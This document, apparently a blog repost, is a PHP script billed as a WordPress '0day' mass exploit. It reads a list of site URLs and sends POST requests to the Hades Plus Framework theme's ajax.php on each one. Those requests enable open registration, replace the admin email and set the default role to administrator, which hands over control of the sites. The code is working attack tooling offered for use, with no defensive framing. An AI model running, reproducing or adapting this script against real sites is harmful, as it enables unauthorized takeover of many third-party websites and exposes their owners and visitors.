[PHP] WordPress 0day Add Admin MASS Exploiting
<?php
/*
coded by Mr.MaGnoM
all rights reserved . dont chabge it
made in morocco
23/09/2013
visit my blog : http://www.nob24.com/
*/
print"
+---------------------------------------------------+
| mass exploiting for exploit |
| WordPress 0day - Hades Plus Framework Add Admin |
| exploit :http://1337day.com/exploit/22660 |
| Coded by Mr.MaGnoM -- twitter : @MrMaGnoM |
| visit my blog : http://www.nob24.com/ |
| usage php $argv[0] list.txt theme |
| exampl : php mass.php list.txt archin |
+---------------------------------------------------+\n
";
if(!$argv[1] and !$argv[2] ){
die("usage php $argv[0] list.txt theme\n");
}
$get=@file_get_contents($argv[1]);
$expl=explode("\n", $get);
foreach ($expl as $key) {
$link="$key/wp-content/themes/$argv[2]/hades_framework/option_panel/ajax.php";
echo "\n\tsite : $key ";
adduser($link);
}
function adduser($site){
$ch = curl_init(
"$site");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array(
"values[0][name]" => "users_can_register",
"values[0][value]" => "1",
"values[1][name]" => "admin_email",
"values[1][value]" => "here ur email",
"values[2][name]" => "default_role",
"values[2][value]" => "administrator",
"action" => "save",
"submit" => "submit"
));
curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
if($result=="success"){
echo "\n\texploit : $result \n";
}else{
echo "\n\texploit : no \n";
}
}
?>
[PHP] WordPress 0day Add Admin MASS Exploiting
![]()
Reviewed by Nguyen Nam Hong
on
10:51 AM
Rating:
